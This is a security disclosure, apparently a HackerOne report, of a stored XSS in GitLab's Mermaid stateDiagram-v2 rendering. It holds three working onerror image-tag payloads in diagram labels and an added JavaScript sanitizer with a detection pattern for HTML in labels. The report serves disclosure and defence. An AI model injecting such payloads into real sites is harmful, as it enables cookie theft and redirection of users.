
Stored XSS via Mermaid (stateDiagram-v2)

HackerOne report #1390805 by solov9ev on 2021-11-03, assigned to @ngeorge1:


Report

Summary

Hi, Security Team!
I discovered a stored XSS vulnerability via Mermaid (stateDiagram-v2).

Steps to reproduce
  • Run GitLab: docker run --detach --hostname gitlab.example.com --publish 443:443 --publish 80:80 --publish 22:22 --name gitlab gitlab/gitlab-ce:latest (GitLab Enterprise Edition 14.4.1-ee)
  • Insert the following payload (stateDiagram-v2) into any Markdown-enabled field that renders Mermaid:
stateDiagram-v2  
    s2 : This is a state description<img/src='1'/onerror=alert()>  

and

stateDiagram-v2  
    s1 --> s2: A<img/src='1'/onerror=alert()>  

1.png

There is another option:

stateDiagram-v2  
    state if_state <<choice>>  
    [*] --> IsPositive  
    IsPositive --> if_state  
    if_state --> False: if n < 0<img/src='1'/onerror=alert()>  
    if_state --> True : if n >= 0  

2.png
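As an added defender-side example (not GitLab's or Mermaid's own code), the following escapes the label text of stateDiagram-v2 lines before the diagram source is handed to the renderer, and separately flags labels that carry HTML so the input can be logged or rejected; the two line patterns it matches are assumptions taken from the three diagrams above.

```javascript
// Added example (not GitLab's or Mermaid's code). Caller-side pre-processing of
// stateDiagram-v2 source: the free-text label of a state description
// (`s2 : text`) or of a transition (`s1 --> s2 : text`) is HTML-escaped so that
// markup such as <img ... onerror=...> becomes literal text, while diagram
// syntax (`<<choice>>`, `[*]`, `-->`) is left untouched. The two line
// patterns are assumptions derived from the three examples in the report.

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
const escapeHtml = (s) => s.replace(/[&<>"']/g, (c) => ESCAPES[c]);

// `a --> b : label`   (state ids: identifiers, hyphenated names, or [*])
const TRANSITION = /^(\s*[\w[\]*-]+\s*-->\s*[\w[\]*-]+\s*:\s*)(.*)$/;
// `stateId : description`
const DESCRIPTION = /^(\s*[\w-]+\s*:\s*)(.*)$/;

// Split one line into [syntax prefix, label], or null if it carries no label.
function splitLabel(line) {
  const m = line.match(TRANSITION) || line.match(DESCRIPTION);
  return m ? [m[1], m[2]] : null;
}

// Return the diagram source with every label HTML-escaped.
function sanitizeStateDiagram(src) {
  return src.split('\n').map((line) => {
    const parts = splitLabel(line);
    return parts ? parts[0] + escapeHtml(parts[1]) : line;
  }).join('\n');
}

// Detection helper: labels containing an HTML tag, so the input can be logged
// or rejected before it reaches the renderer.
function findMarkupLabels(src) {
  return src.split('\n')
    .map(splitLabel)
    .filter((p) => p && /<[A-Za-z!\/]/.test(p[1]))
    .map((p) => p[1]);
}

// Constructed input: the third diagram from the report.
const SAMPLE = [
  'stateDiagram-v2',
  '    state if_state <<choice>>',
  '    [*] --> IsPositive',
  '    IsPositive --> if_state',
  "    if_state --> False: if n < 0<img/src='1'/onerror=alert()>",
  '    if_state --> True : if n >= 0',
].join('\n');

console.log(findMarkupLabels(SAMPLE));
console.log(sanitizeStateDiagram(SAMPLE));
```

Escaping on the caller's side is a defence-in-depth layer only: how an escaped entity is displayed depends on the renderer's label mode, and the renderer's own sanitization remains the primary control.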

Impact

With this vulnerability, an attacker can, for example, steal users' cookies or redirect users to a malicious website.
